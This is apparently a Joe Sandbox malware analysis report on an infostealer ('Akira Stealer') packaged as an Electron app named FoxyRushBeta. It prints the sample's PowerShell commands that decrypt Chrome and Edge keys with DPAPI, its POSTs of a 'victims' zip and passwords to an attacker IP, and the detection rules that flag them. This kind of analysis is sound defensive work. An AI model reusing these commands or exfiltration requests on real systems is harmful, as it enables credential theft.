Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bkHLzNaNMS.exe

Overview

General Information

Sample name:bkHLzNaNMS.exe
renamed because original name is a hash value
Original sample name:f0b16538689c8c0e7ea186f4cfb2f1fbc555ecb9ab26c55511be13e730388570.exe
Analysis ID:1631455
MD5:408339f6e7f66e152371d41ad5f87f30
SHA1:e1fb82a61a19969899e5564f6e08e7fa9acc6bec
SHA256:f0b16538689c8c0e7ea186f4cfb2f1fbc555ecb9ab26c55511be13e730388570
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Detected generic credential text file
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • bkHLzNaNMS.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\bkHLzNaNMS.exe" MD5: 408339F6E7F66E152371D41AD5F87F30)
    • FoxyRushBeta.exe (PID: 3712 cmdline: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5780 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • FoxyRushBeta.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 1656 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4320 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • FoxyRushBeta.exe (PID: 5336 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 5948 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6120 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • FoxyRushBeta.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5636 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • FoxyRushBeta.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8 MD5: FC4789C7070BC50237A11B100DBC7DB3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser'), CommandLine: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser'), CommandLine|base64offset|contains: ~O*^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,1

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T06:39:11.761382+010020298461A Network Trojan was detected192.168.2.549725151.243.200.6280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T06:39:11.761382+010020350161A Network Trojan was detected192.168.2.549725151.243.200.6280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-07T06:39:11.761382+010020350151A Network Trojan was detected192.168.2.549725151.243.200.6280TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: bkHLzNaNMS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\LICENSE.electron.txtJump to behavior
Source: bkHLzNaNMS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primnoJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapiJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modulesJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpackedJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\localesJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2029846 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) : 192.168.2.5:49725 -> 151.243.200.62:80
Source: Network trafficSuricata IDS: 2035015 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2 : 192.168.2.5:49725 -> 151.243.200.62:80
Source: Network trafficSuricata IDS: 2035016 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2 : 192.168.2.5:49725 -> 151.243.200.62:80
Source: global trafficHTTP traffic detected: POST /upload HTTP/1.1content-type: multipart/form-data; boundary=--------------------------512384708799784675160631Host: 151.243.200.62Content-Length: 1346Connection: keep-aliveData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 31 32 33 38 34 37 30 38 37 39 39 37 38 34 36 37 35 31 36 30 36 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 35 37 39 35 36 39 76 69 63 74 69 6d 73 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a Data Ascii: ----------------------------512384708799784675160631Content-Disposition: form-data; name="file"; filename="579569victims1.zip"Content-Type: application/zip
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewASN Name: RASANAIR RASANAIR
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownTCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /inject HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/1.8.1Accept-Encoding: gzip, compress, deflate, brHost: 151.243.200.62Connection: keep-alive
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /passwords HTTP/1.1Accept: application/json, text/plain, */*Content-Type: application/jsonUser-Agent: axios/1.8.1Content-Length: 130Accept-Encoding: gzip, compress, deflate, brHost: 151.243.200.62Connection: keep-aliveData Raw: 7b 22 70 61 73 73 77 6f 72 64 73 22 3a 22 3c 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5b 41 6b 69 72 61 20 53 74 65 61 6c 65 72 5d 3e 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3e 5c 6e 5c 6e 4e 6f 20 70 61 73 73 77 6f 72 64 73 20 66 6f 75 6e 64 2e 22 2c 22 6b 65 79 22 3a 22 31 32 32 62 38 38 61 33 66 63 31 61 66 33 61 35 33 66 38 65 36 62 64 37 65 37 36 33 30 64 37 37 22 7d Data Ascii: {"passwords":"<================[Akira Stealer]>================>\n\nNo passwords found.","key":"122b88a3fc1af3a53f8e6bd7e7630d77"}
Source: libGLESv2.dll.0.drString found in binary or memory: http://anglebug.com/42267082
Source: libGLESv2.dll.0.drString found in binary or memory: http://anglebug.com/42267082ProgramGL::postLinkJobImpl
Source: elevate.exe.0.drString found in binary or memory: http://int3.de/
Source: bkHLzNaNMS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=frCtrl$1
Source: sw.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=sw&category=theme81https://myactivity.google.com/myactivity/?u
Source: sw.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=swCtrl$1
Source: zh-CN.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity
Source: zh-CN.pak.0.drString found in binary or memory: https://chrome.google.com/webstore?hl=zh-CNCtrl$1
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: dpapi_win.cpp.0.drString found in binary or memory: https://github.com/bradhugh/node-dpapi
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://myactivity.google.com/
Source: sw.pak.0.drString found in binary or memory: https://passwords.google.comAkaunti
Source: fr.pak.0.drString found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://policies.google.com/
Source: libGLESv2.dll.0.drString found in binary or memory: https://shorturl.at/drFY7)
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: zh-CN.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
Source: sw.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa
Source: libGLESv2.dll.0.drString found in binary or memory: https://www.khronos.org/spir/visualizer/
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile dump: FoxyRushBeta.exe.0.dr 190491136Jump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile dump: FoxyRushBeta.exe0.0.dr 190491136Jump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess token adjusted: SecurityJump to behavior
Source: FoxyRushBeta.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: FoxyRushBeta.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: bkHLzNaNMS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal60.spyw.winEXE@31/128@1/2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeFile created: C:\Users\user\AppData\Roaming\FoxyRushBetaJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeMutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_03
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF37.tmpJump to behavior
Source: bkHLzNaNMS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
